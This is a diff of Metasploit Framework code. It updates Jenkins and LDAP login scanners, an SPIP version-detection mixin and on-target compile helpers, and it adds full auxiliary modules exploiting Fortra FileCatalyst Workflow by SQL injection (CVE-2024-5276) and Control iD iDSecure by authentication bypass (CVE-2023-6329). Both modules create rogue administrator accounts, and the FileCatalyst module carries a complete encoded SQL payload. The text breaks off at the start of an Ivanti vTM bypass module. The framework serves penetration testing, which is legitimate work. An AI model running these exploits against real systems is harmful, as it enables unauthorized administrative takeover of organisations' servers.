-              'method' => method,
-              'uri' => uri,
-              'vars_post' => request['vars_post']
-            })
-          end
+          status, proof = jenkins_login(credential.public, credential.private)

          result_opts.merge!(status: status, proof: proof)

          Result.new(result_opts)
        end
+
+        protected
+
+        # Returns a boolean value indicating whether the request requires authentication or not.
+        #
+        # @param [Rex::Proto::Http::Response] response The response received from the HTTP endpoint
+        # @return [Boolean] True if the request required authentication; otherwise false.
+        def authentication_required?(response)
+          return false unless response
+
+          self.class::DEFAULT_HTTP_NOT_AUTHED_CODES.include?(response.code)
+        end
+
+        private
+
+        # This method takes a username and password and a target URI
+        # then attempts to login to Jenkins and will either fail with appropriate errors
+        #
+        # @param [String] username The username for login credentials
+        # @param [String] password The password for login credentials
+        # @return [Array] [status, proof] The result of the login attempt
+        def jenkins_login(username, password)
+          begin
+            res = send_request(
+              'method' => 'POST',
+              'uri' => self.uri,
+              'vars_post' => {
+                'j_username' => username,
+                'j_password' => password,
+                'Submit' => 'log in'
+              }
+            )
+
+            if res && res.headers['Location'] && !res.headers['Location'].include?('loginError')
+              status = Metasploit::Model::Login::Status::SUCCESSFUL
+              proof = res.headers
+            else
+              status = Metasploit::Model::Login::Status::INCORRECT
+              proof = res
+            end
+          rescue ::EOFError, Errno::ETIMEDOUT, Errno::ECONNRESET, Rex::ConnectionError, OpenSSL::SSL::SSLError, ::Timeout::Error => e
+            status = Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+            proof = e
+          end
+
+          [status, proof]
+        end
+
+        # This method uses the provided URI to determine whether login is possible for Jenkins.
+        # Based on the contents of the provided URI, the method looks for the login form and
+        # extracts the endpoint used to authenticate against.
+        #
+        # @return [String, nil] URI for successful login
+        def jenkins_login_url
+          response = send_request({ 'uri' => normalize_uri('login') })
+
+          if response&.code == 200 && response&.body =~ LOGIN_PATH_REGEX
+            return Regexp.last_match(1)
+          end
+
+          nil
+        end
+
+        # Determines whether the provided response is considered valid or not.
+        #
+        # @param [Rex::Proto::Http::Response, nil] response The response received from the HTTP request.
+        # @return [Boolean] True if the response if valid; otherwise false.
+        def valid_response?(response)
+          http_success_codes.include?(response&.code)
+        end
      end
    end
  end
@@ -11,11 +11,22 @@ module Metasploit
        include Metasploit::Framework::LDAP::Client
        include Msf::Exploit::Remote::LDAP

+        LIKELY_PORTS         = [ 389, 636 ]
+        LIKELY_SERVICE_NAMES = [ 'ldap', 'ldaps', 'ldapssl' ]
+
        attr_accessor :opts, :realm_key
        # @!attribute use_client_as_proof
        #   @return [Boolean] If a login is successful and this attribute is true - an LDAP::Client instance is used as proof
        attr_accessor :use_client_as_proof

+        # This method sets the sane defaults for things
+        # like timeouts and TCP evasion options
+        def set_sane_defaults
+          self.opts ||= {}
+          self.connection_timeout = 30 if self.connection_timeout.nil?
+          nil
+        end
+
        def attempt_login(credential)
          result_opts = {
            credential: credential,
@@ -23,7 +34,8 @@ module Metasploit
            proof: nil,
            host: host,
            port: port,
-            protocol: 'ldap'
+            protocol: 'tcp',
+            service_name: 'ldap'
          }

          result_opts.merge!(do_login(credential))
@@ -34,7 +46,8 @@ module Metasploit
          opts = {
            username: credential.public,
            password: credential.private,
-            framework_module: framework_module
+            framework_module: framework_module,
+            ldap_auth: 'auto'
          }.merge(@opts)

          connect_opts = ldap_connect_opts(host, port, connection_timeout, ssl: opts[:ssl], opts: opts)
@@ -32,7 +32,7 @@ module Metasploit
        end
      end

-      VERSION = "6.4.19"
+      VERSION = "6.4.26"
      MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
      PRERELEASE = 'dev'
      HASH = get_hash
@@ -55,6 +55,29 @@ module Msf
        super
      end

+      # Creates a credential and adds to to the DB if one is present, then calls create_credential_login to
+      # attempt a login
+      #
+      # This is needed when create_credential_and_login in
+      # lib/metasploit/framework/data_service/proxy/credential_data_proxy.rb
+      # is called, which doesn't call of to create_credential_login at any point to initialize @report[rhost]
+      #
+      # This allow modules that make use of create_credential_and_login to make use of the report summary mixin
+      #
+      # @param [Hash] credential_data
+      # @return [Metasploit::Credential::Login]
+      def create_credential_and_login(credential_data)
+        return super unless framework.features.enabled?(Msf::FeatureManager::SHOW_SUCCESSFUL_LOGINS) && datastore['ShowSuccessfulLogins'] && @report
+
+        credential = {
+          public: credential_data[:username],
+          private_data: credential_data[:private_data]
+        }
+        @report[rhost] = { successful_logins: [] }
+        @report[rhost][:successful_logins] << credential
+        super
+      end
+
      # Framework is notified that we have a new session opened
      #
      # @param [MetasploitModule] obj
@@ -65,7 +88,13 @@ module Msf
      # @param [Msf::Sessions::<SESSION_CLASS>] sess
      # @return [Msf::Sessions::<SESSION_CLASS>]
      def start_session(obj, info, ds_merge, crlf = false, sock = nil, sess = nil)
-        return super unless framework.features.enabled?(Msf::FeatureManager::SHOW_SUCCESSFUL_LOGINS) && datastore['ShowSuccessfulLogins'] && @report
+        return super unless framework.features.enabled?(Msf::FeatureManager::SHOW_SUCCESSFUL_LOGINS) && datastore['ShowSuccessfulLogins']
+
+        unless @report && @report[rhost]
+          elog("No RHOST found in report, skipping reporting for #{rhost}")
+          print_brute level: :error, ip: rhost, msg: "No RHOST found in report, skipping reporting for #{rhost}"
+          return super
+        end

        result = super
        @report[rhost].merge!({ successful_sessions: [] })
@@ -15,7 +15,7 @@ module Msf
            res = send_request_cgi({ 'uri' => uri })

            unless res
-              return nil 
+              return nil
            end

            # shortcut for new versions such as 2.426.2 and 2.440
@@ -0,0 +1,80 @@
+# -*- coding: binary -*-
+
+module Msf
+  module Exploit::Remote::HTTP::Spip
+    include Msf::Exploit::Remote::HttpClient
+
+    def initialize(info = {})
+      super
+
+      register_options([
+        OptString.new('TARGETURI', [true, 'Path to Spip install', '/'])
+      ])
+    end
+
+    # Determine Spip version
+    #
+    # @return [Rex::Version] Version as Rex::Version
+    def spip_version
+      res = send_request_cgi(
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'spip.php')
+      )
+
+      return unless res
+
+      version = nil
+
+      potential_sources = [
+        res.get_html_document.at('head/meta[@name="generator"]/@content')&.text,
+        res.headers['Composed-By']
+      ]
+
+      potential_sources.each do |text|
+        next unless text
+
+        if text =~ /SPIP\s(\d+(\.\d+)+)/
+          version = ::Regexp.last_match(1)
+          break
+        end
+      end
+
+      return version ? Rex::Version.new(version) : nil
+    end
+
+    # Determine Spip plugin version by name
+    #
+    # @param [String] plugin_name Name of the plugin to search for
+    # @return [Rex::Version, nil] Version of the plugin as Rex::Version, or nil if not found
+    def spip_plugin_version(plugin_name)
+      res = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'spip.php'))
+      return unless res
+
+      composed_by = res.headers['Composed-By']
+      # Case 1: Check if 'Composed-By' header is present and not empty
+      version = composed_by&.present? ? parse_plugin_version(composed_by, plugin_name) : nil
+      return version if version
+
+      # Case 2: Extract URL from 'Composed-By' header and send a request to fetch the config.txt file
+      config_url = composed_by =~ %r{(https?://[^\s]+/local/config\.txt)}i ? ::Regexp.last_match(1) : normalize_uri(target_uri.path, 'local', 'config.txt')
+      config_res = send_request_cgi('method' => 'GET', 'uri' => config_url)
+      return parse_plugin_version(config_res.body, plugin_name) if config_res&.code == 200
+
+      nil
+    end
+
+    # Parse the plugin version from config.txt or composed-by
+    #
+    # @param [String] body The body content to parse
+    # @param [String] plugin_name Name of the plugin to find the version for
+    # @return [Rex::Version, nil] Version of the plugin as Rex::Version, or nil if not found
+    def parse_plugin_version(body, plugin_name)
+      body.each_line do |line|
+        if line =~ /#{plugin_name}\((\d+(\.\d+)+)\)/
+          return Rex::Version.new(::Regexp.last_match(1))
+        end
+      end
+      nil
+    end
+  end
+end
@@ -116,6 +116,9 @@ module Exploit::Remote::HttpServer
  # completely on the datastore. (See dlink_upnp_exec_noauth)
  def start_service(opts = {})

+    # Keep compatibility with modules that don't pass the ssl option to the start server but rely on the datastore instead.
+    opts['ssl'] = opts['ssl'].nil? ? datastore['SSL'] : opts['ssl']
+
    check_dependencies

    # Start a new HTTP server service.
@@ -123,7 +126,7 @@ module Exploit::Remote::HttpServer
      Rex::Proto::Http::Server,
      (opts['ServerPort'] || bindport).to_i,
      opts['ServerHost'] || bindhost,
-      datastore['SSL'], # XXX: Should be in opts, need to test this
+      opts['ssl'],
      {
        'Msf'        => framework,
        'MsfExploit' => self,
@@ -149,7 +152,7 @@ module Exploit::Remote::HttpServer
      'Path' => opts['Path'] || resource_uri
    }.update(opts['Uri'] || {})

-    proto = (datastore["SSL"] ? "https" : "http")
+    proto = (opts['ssl'] ? "https" : "http")

    # SSLCompression may or may not actually be available. For example, on
    # Ubuntu, it's disabled by default, unless the correct environment
@@ -11,39 +11,46 @@ module Compile
    super
    register_options( [
      OptEnum.new('COMPILE', [true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']]),
+      OptEnum.new('COMPILER', [true, 'Compiler to use on target', 'gcc', ['gcc', 'clang']]),
    ], self.class)
  end

  def live_compile?
    return false unless %w{ Auto True }.include?(datastore['COMPILE'])

-    if has_gcc?
+    if datastore['COMPILER'] == 'gcc' && has_gcc?
      vprint_good 'gcc is installed'
      return true
+    elsif datastore['COMPILER'] == 'clang' && has_clang?
+      vprint_good 'clang is installed'
+      return true
    end

    unless datastore['COMPILE'] == 'Auto'
-      fail_with Module::Failure::BadConfig, 'gcc is not installed. Set COMPILE False to upload a pre-compiled executable.'
+      fail_with Module::Failure::BadConfig, "#{datastore['COMPILER']} is not installed. Set COMPILE False to upload a pre-compiled executable."
    end
+
+    false
  end

-  def upload_and_compile(path, data, gcc_args='')
+  def upload_and_compile(path, data, compiler_args='')
    write_file "#{path}.c", strip_comments(data)

-    gcc_cmd = "gcc -o '#{path}' '#{path}.c'"
+    compiler_cmd = "#{datastore['COMPILER']} -o '#{path}' '#{path}.c'"
    if session.type == 'shell'
-      gcc_cmd = "PATH=\"$PATH:/usr/bin/\" #{gcc_cmd}"
+      compiler_cmd = "PATH=\"$PATH:/usr/bin/\" #{compiler_cmd}"
    end

-    unless gcc_args.to_s.blank?
-      gcc_cmd << " #{gcc_args}"
+    unless compiler_args.to_s.blank?
+      compiler_cmd << " #{compiler_args}"
    end

-    output = cmd_exec gcc_cmd
+    verification_token = Rex::Text.rand_text_alphanumeric(8)
+    success = cmd_exec("#{compiler_cmd} && echo #{verification_token}")&.include?(verification_token)
+
    rm_f "#{path}.c"

-    unless output.blank?
-      print_error output
+    unless success
      message = "#{path}.c failed to compile."
      # don't mention the COMPILE option if it was deregistered
      message << ' Set COMPILE to False to upload a pre-compiled executable.' if options.include?('COMPILE')
@@ -65,6 +65,12 @@ module Kernel
    return ARCH_AARCH64 if arch == 'aarch64' || arch == 'arm64'
    return ARCH_ARMLE if arch.start_with?'arm'
    return ARCH_X86 if arch.end_with?'86'
+    return ARCH_PPC if arch == 'ppc'
+    return ARCH_PPC64 if arch == 'ppc64'
+    return ARCH_PPC64LE if arch == 'ppc64le'
+    return ARCH_MIPS if arch == 'mips'
+    return ARCH_MIPS64 if arch == 'mips64'
+    return ARCH_SPARC if arch == 'sparc'
    arch
  end

@@ -74,8 +80,8 @@ module Kernel
  # @return [Array]
  #
  def kernel_config
-   return unless cmd_exec('test -r /boot/config-`uname -r` && echo true').include? 'true'
-    output = cmd_exec("cat /boot/config-`uname -r`").to_s.strip
+    release = kernel_release
+    output = read_file("/boot/config-#{release}").to_s.strip
    return if output.empty?
    config = output.split("\n").map(&:strip).reject(&:empty?).reject {|i| i.start_with? '#'}
    config
@@ -250,7 +256,7 @@ module Kernel
  # Returns true if grsecurity is installed
  #
  def grsec_installed?
-    cmd_exec('test -c /dev/grsec && echo true').to_s.strip.include? 'true'
+    File.exists?('/dev/grsec') && File.chardev?('/dev/grsec')
  rescue
    raise 'Could not determine grsecurity status'
  end
@@ -218,6 +218,16 @@ module Msf
          raise 'Unable to check for gcc'
        end

+        #
+        # Checks if the system has clang installed
+        # @return [Boolean]
+        #
+        def has_clang?
+          command_exists? 'clang'
+        rescue StandardError
+          raise 'Unable to check for clang'
+        end
+
        #
        # Checks if `file_path` is mounted on a noexec mount point
        # @return [Boolean]
@@ -539,7 +539,7 @@ class RPC_Module < RPC_Base
      if r[:error]
        {"status" => "errored", "error" => r[:error]}
      else
-        if r[:result].length == 1
+        if r[:result] && r[:result].length == 1
          # A hash of one IP => result
          # TODO: make hashes of IP => result the normal case
          {"status" => "completed", "result" => r[:result].values.first}
@@ -965,7 +965,7 @@ private
    # Create the migrate stager
    migrate_stager = c.new()

-    migrate_stager.stage_meterpreter
+    migrate_stager.stage_meterpreter({datastore: {'MeterpreterDebugBuild' => client.debug_build}})
  end

  #
@@ -0,0 +1,268 @@
+require 'digest/md5'
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Fortra FileCatalyst Workflow SQL Injection (CVE-2024-5276)',
+        'Description' => %q{
+          This module exploits a SQL injection vulnerability in Fortra FileCatalyst Workflow <= v5.1.6 Build 135, by adding a new
+          administrative user to the web interface of the application.
+        },
+        'Author' => [
+          'Tenable', # Discovery and PoC
+          'Michael Heinzl' # MSF Module
+        ],
+        'References' => [
+          ['CVE', '2024-5276'],
+          ['URL', 'https://www.tenable.com/security/research/tra-2024-25'],
+          ['URL', 'https://support.fortra.com/filecatalyst/kb-articles/advisory-6-24-2024-filecatalyst-workflow-sql-injection-vulnerability-YmYwYWY4OTYtNTUzMi1lZjExLTg0MGEtNjA0NWJkMDg3MDA0']
+        ],
+        'DisclosureDate' => '2024-06-25',
+        'DefaultOptions' => {
+          'RPORT' => 8080
+        },
+        'License' => MSF_LICENSE,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/']),
+      OptString.new('NEW_USERNAME', [true, 'Username to be used when creating a new user with admin privileges', Faker::Internet.username]),
+      OptString.new('NEW_PASSWORD', [true, 'Password to be used when creating a new user with admin privileges', Rex::Text.rand_text_alphanumeric(16)]),
+      OptString.new('NEW_EMAIL', [true, 'E-mail to be used when creating a new user with admin privileges', Faker::Internet.email])
+    ])
+  end
+
+  def run
+    print_status('Starting SQL injection workflow...')
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'workflow/')
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+    unless res.code == 200
+      fail_with(Failure::UnexpectedReply, 'Unexpected reply from the target.')
+    end
+    print_good('Server reachable.')
+
+    raw_res = res.to_s
+    unless raw_res =~ /JSESSIONID=(\w+);/
+      fail_with(Failure::UnexpectedReply, 'JSESSIONID not found.')
+    end
+
+    jsessionid = ::Regexp.last_match(1)
+    print_status("JSESSIONID value: #{jsessionid}")
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, "workflow/jsp/logon.jsp;jsessionid=#{jsessionid}"),
+      'headers' => {
+        'Cookie' => "JSESSIONID=#{jsessionid}"
+      }
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+
+    body = res.body
+    unless body =~ /name="FCWEB\.FORM\.TOKEN" value="([^"]+)"/
+      fail_with(Failure::UnexpectedReply, 'FCWEB.FORM.TOKEN not found.')
+    end
+
+    token_value = ::Regexp.last_match(1)
+    print_status("FCWEB.FORM.TOKEN value: #{token_value}")
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, "workflow/logonAnonymous.do?FCWEB.FORM.TOKEN=#{token_value}"),
+      'headers' => {
+        'Cookie' => "JSESSIONID=#{jsessionid}"
+      }
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+
+    unless res.headers['Location']
+      fail_with(Failure::UnexpectedReply, 'Location header not found.')
+    end
+
+    location_value = res.headers['Location']
+    print_status("Redirect #1: #{location_value}")
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, location_value.to_s),
+      'headers' => {
+        'Cookie' => "JSESSIONID=#{jsessionid}"
+      }
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+
+    unless res.headers['Location']
+      fail_with(Failure::UnexpectedReply, 'Location header not found.')
+    end
+
+    location_value = res.headers['Location']
+    print_status("Redirect #2: #{location_value}")
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, location_value.to_s),
+      'headers' => {
+        'Cookie' => "JSESSIONID=#{jsessionid}"
+      }
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+
+    html = res.get_html_document
+    h2_tag = html.at_css('h2')
+
+    unless h2_tag
+      fail_with(Failure::UnexpectedReply, 'h2 tag not found.')
+    end
+
+    h2_text = h2_tag.text.strip
+    unless h2_text == 'Choose an Order Type'
+      fail_with(Failure::UnexpectedReply, 'Unexpected string found inside h2 tag: ' + h2_text)
+    end
+
+    print_status('Received expected response.')
+
+    t = Time.now
+    username = datastore['NEW_USERNAME']
+    password = Digest::MD5.hexdigest(datastore['NEW_PASSWORD']).upcase
+    email = datastore['NEW_EMAIL']
+    firstname = Faker::Name.first_name
+    lastname = Faker::Name.last_name
+    areacode = rand(100..999)
+    exchangecode = rand(100..999)
+    subscribernumber = rand(1000..9999)
+    phone = format('(%<areacode>03d) %<exchangecode>03d-%<subscribernumber>04d',
+                   areacode: areacode,
+                   exchangecode: exchangecode,
+                   subscribernumber: subscribernumber)
+    creation = "+#{t.strftime('%s%L')}"
+    pw_creationdate = "+#{t.strftime('%s%L')}"
+    lastlogin = "+#{t.strftime('%s%L')}"
+
+    vprint_status('Adding New Admin User:')
+    vprint_status("\tUsername: #{username}")
+    vprint_status("\tPassword: #{datastore['NEW_PASSWORD']} (#{password})")
+    vprint_status("\tEmail: #{email}")
+    vprint_status("\tFirstName: #{firstname}")
+    vprint_status("\tLastName: #{lastname}")
+    vprint_status("\tPhone: #{phone}")
+    vprint_status("\tCreation: #{creation}")
+    vprint_status("\tPW_CreationDate: #{pw_creationdate}")
+    vprint_status("\tLastLogin: #{lastlogin}")
+
+    payload = '1%27%3BINSERT+INTO+DOCTERA_USERS+%28USERNAME%2C+PASSWORD%2C+ENCPASSWORD%2C+FIRSTNAME%2C+LASTNAME%2C+COMPANY%2C' \
+              'ADDRESS%2C+ADDRESS2%2C+CITY%2C+STATE%2C+ALTPHONE%2C+ZIP%2C+COUNTRY%2C+PHONE%2C+FAX%2C+EMAIL%2C+LASTLOGIN%2C' \
+              'CREATION%2C+PREFERREDSERVER%2C+CREDITCARDTYPE%2C+CREDITCARDNUMBER%2C+CREDITCARDEXPIRY%2C+ACCOUNTSTATUS%2C+USERTYPE%2C' \
+              'COMMENT%2C+ADMIN%2C+SUPERADMIN%2C+ACCEPTEMAIL%2C+ALLOWHOTFOLDER%2C+PROTOCOL%2C+BANDWIDTH%2C+DIRECTORY%2C+SLOWSTARTRATE%2C' \
+              'USESLOWSTART%2C+SLOWSTARTAGGRESSIONRATE%2C+BLOCKSIZE%2C+UNITSIZE%2C+NUMENCODERS%2C+NUMFTPSTREAMS%2C+ALLOWUSERBANDWIDTHTUNING%2C' \
+              'EXPIRYDATE%2C+ALLOWTEMPACCOUNTCREATION%2C+OWNERUSERNAME%2C+USERLEVEL%2C+UPLOADMETHOD%2C+PW_CHANGEABLE%2C+PW_CREATIONDATE%2C' \
+              "PW_DAYSBEFOREEXPIRE%2C+PW_MUSTCHANGE%2C+PW_USEDPASSWORDS%2C+PW_NUMERRORS%29+VALUES%28%27#{username}%27%2C+NULL%2C+" \
+              "%27#{password}%27%2C+%27#{firstname}%27%2C+%27#{lastname}%27%2C+%27%27%2C+" \
+              '%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27202-404-2400%27%2C+%27%27%2C+' \
+              "%27#{email}%27%2C#{lastlogin}%2C#{creation}%2C+%27default%27%2C+%27%27%2C+%27%27%2C+" \
+              '%27%27%2C+%27full+access%27%2C+%27%27%2C+%27%27%2C+1%2C+0%2C+0%2C+0%2C+%27DEFAULT%27%2C+%270%27%2C+0%2C+' \
+              '%270%27%2C+1%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+0%2C+0%2C+0%2C+%27%27%2C+0%2C+' \
+              "%27DEFAULT%27%2C+0%2C#{pw_creationdate}%2C+-1%2C+0%2C+NULL%2C+0%29%3B--+-"
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, "workflow/servlet/pdf_servlet?JOBID=#{payload}"),
+      'headers' => {
+        'Cookie' => "JSESSIONID=#{jsessionid}"
+      }
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+
+    fail_with(Failure::UnexpectedReply, "Unexpected HTTP code from the target: #{res.code}") unless res.code == 200
+    fail_with(Failure::UnexpectedReply, 'Unexpected reply from the target.') unless res.body.to_s == ''
+    print_good('SQL injection successful!')
+
+    print_status('Confirming credentials...')
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'workflow/jsp/logon.jsp'),
+      'headers' => {
+        'Cookie' => "JSESSIONID=#{jsessionid}"
+      }
+    )
+
+    fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.') unless res
+
+    body = res.body
+    unless body =~ /name="FCWEB\.FORM\.TOKEN" value="([^"]+)"/
+      fail_with(Failure::UnexpectedReply, 'FCWEB.FORM.TOKEN not found.')
+    end
+
+    token_value = ::Regexp.last_match(1)
+    print_status("FCWEB.FORM.TOKEN value: #{token_value}")
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'workflow/logon.do'),
+      'headers' => {
+        'Cookie' => "JSESSIONID=#{jsessionid}",
+        'Content-Type' => 'application/x-www-form-urlencoded'
+      },
+      'vars_post' => {
+        'username' => datastore['NEW_USERNAME'],
+        'password' => datastore['NEW_PASSWORD'],
+        'FCWEB.FORM.TOKEN' => token_value.to_s,
+        'submit' => 'Login'
+      }
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+
+    html = res.get_html_document
+    title_block = html.at_css('.titleBlock')
+
+    unless title_block
+      fail_with(Failure::UnexpectedReply, 'Expected titleBlock not found.')
+    end
+    title_text = title_block.text.strip
+
+    unless title_text.include?('Administration')
+      fail_with(Failure::UnexpectedReply, 'Expected string "Administration" not found.')
+    end
+    store_valid_credential(user: datastore['NEW_USERNAME'], private: datastore['NEW_PASSWORD'], proof: html)
+    print_good('Login successful!')
+
+    print_good("New admin user was successfully injected:\n\t#{datastore['NEW_USERNAME']}:#{datastore['NEW_PASSWORD']}")
+    print_good("Login at: #{full_uri(normalize_uri(target_uri, 'workflow/jsp/logon.jsp'))}")
+  end
+
+end
@@ -0,0 +1,185 @@
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+  CheckCode = Exploit::CheckCode
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Control iD iDSecure Authentication Bypass (CVE-2023-6329)',
+        'Description' => %q{
+          This module exploits an improper access control vulnerability (CVE-2023-6329) in Control iD iDSecure <= v4.7.43.0. It allows an
+          unauthenticated remote attacker to compute valid credentials and to add a new administrative user to the web interface of the product.
+        },
+        'Author' => [
+          'Michael Heinzl', # MSF Module
+          'Tenable' # Discovery and PoC
+        ],
+        'References' => [
+          ['CVE', '2023-6329'],
+          ['URL', 'https://www.tenable.com/security/research/tra-2023-36']
+        ],
+        'DisclosureDate' => '2023-11-27',
+        'DefaultOptions' => {
+          'RPORT' => 30443,
+          'SSL' => 'True'
+        },
+        'License' => MSF_LICENSE,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('NEW_USER', [true, 'The new administrative user to add to the system', Rex::Text.rand_text_alphanumeric(8)]),
+      OptString.new('NEW_PASSWORD', [true, 'Password for the specified user', Rex::Text.rand_text_alphanumeric(12)])
+    ])
+  end
+
+  def check
+    begin
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'api/util/configUI')
+      })
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
+      return CheckCode::Unknown
+    end
+
+    return CheckCode::Unknown unless res&.code == 401
+
+    data = res.get_json_document
+    version = data['Version']
+    return CheckCode::Unknown if version.nil?
+
+    print_status('Got version: ' + version)
+    return CheckCode::Safe unless Rex::Version.new(version) <= Rex::Version.new('4.7.43.0')
+
+    return CheckCode::Appears
+  end
+
+  def run
+    # 1) Obtain the serial and passwordRandom
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'api/login/unlockGetData')
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+    unless res.code == 200
+      fail_with(Failure::UnexpectedReply, res.to_s)
+    end
+
+    json = res.get_json_document
+    unless json.key?('passwordRandom') && json.key?('serial')
+      fail_with(Failure::UnexpectedReply, 'Unable to retrieve passwordRandom and serial')
+    end
+
+    password_random = json['passwordRandom']
+    serial = json['serial']
+    print_good('Retrieved passwordRandom: ' + password_random)
+    print_good('Retrieved serial: ' + serial)
+
+    # 2) Create passwordCustom
+    sha1_hash = Digest::SHA1.hexdigest(serial)
+    combined_string = sha1_hash + password_random + 'cid2016'
+    sha256_hash = Digest::SHA256.hexdigest(combined_string)
+    short_hash = sha256_hash[0, 6]
+    password_custom = short_hash.to_i(16).to_s
+    print_status("Created passwordCustom: #{password_custom}")
+
+    # 3) Login with passwordCustom and passwordRandom to obtain a JWT
+    body = "{\"passwordCustom\": \"#{password_custom}\", \"passwordRandom\": \"#{password_random}\"}"
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'ctype' => 'application/json',
+      'uri' => normalize_uri(target_uri.path, 'api/login/'),
+      'data' => body
+    })
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+    unless res.code == 200
+      fail_with(Failure::UnexpectedReply, res.to_s)
+    end
+
+    json = res.get_json_document
+    unless json.key?('accessToken')
+      fail_with(Failure::UnexpectedReply, 'Did not receive JWT')
+    end
+
+    access_token = json['accessToken']
+    print_good('Retrieved JWT: ' + access_token)
+
+    # 4) Add a new administrative user
+    body = {
+      idType: '1',
+      name: datastore['NEW_USER'],
+      user: datastore['NEW_USER'],
+      newPassword: datastore['NEW_PASSWORD'],
+      password_confirmation: datastore['NEW_PASSWORD']
+    }.to_json
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'ctype' => 'application/json',
+      'headers' => {
+        'Authorization' => "Bearer #{access_token}"
+      },
+      'uri' => normalize_uri(target_uri.path, 'api/operator/'),
+      'data' => body
+    })
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+
+    unless res.code == 200
+      fail_with(Failure::UnexpectedReply, res.to_s)
+    end
+
+    json = res.get_json_document
+    unless json.key?('code') && json['code'] == 200 && json.key?('error') && json['error'] == 'OK'
+      fail_with(Failure::UnexpectedReply, 'Received unexpected value for code and/or error:\n' + json.to_s)
+    end
+
+    # 5) Confirm credentials work
+    body = {
+      username: datastore['NEW_USER'],
+      password: datastore['NEW_PASSWORD'],
+      passwordCustom: nil
+    }.to_json
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'ctype' => 'application/json',
+      'uri' => normalize_uri(target_uri.path, 'api/login/'),
+      'data' => body
+    })
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+
+    unless res.code == 200
+      fail_with(Failure::UnexpectedReply, res.to_s)
+    end
+
+    json = res.get_json_document
+    unless json.key?('accessToken') && json.key?('unlock')
+      fail_with(Failure::UnexpectedReply, 'Received unexpected reply:\n' + json.to_s)
+    end
+
+    store_valid_credential(user: datastore['NEW_USER'], private: datastore['NEW_PASSWORD'], proof: json.to_s)
+    print_good("New user '#{datastore['NEW_USER']}:#{datastore['NEW_PASSWORD']}' was successfully added.")
+    print_good("Login at: #{full_uri(normalize_uri(target_uri, '#/login'))}")
+  end
+end
@@ -0,0 +1,124 @@
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Ivanti Virtual Traffic Manager Authentication Bypass (CVE-2024-7593)',
+        'Description' => %q{
+          This module exploits an access control issue in Ivanti Virtual Traffic Manager (vTM), by adding a new
+          administrative user to the web interface of the application.
+
+          Affected versions include 22.7R1, 22.6R1, 22.5R1, 22.3R2, 22.3, 22.2.
+        },
+        'Author' => [
+          'Michael Heinzl', # MSF Module
+          'ohnoisploited', # PoC
+          'mxalias' # Credited in the vendor advisory for the discovery, https://hackerone.com/mxalias?type=user
+        ],
+        'References' => [
+          ['PACKETSTORM', '179906'],
+          ['CVE', '2024-7593'],
+          ['URL', 'https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Virtual-Traffic-Manager-vTM-CVE-2024-7593?language=en_US']
+        ],
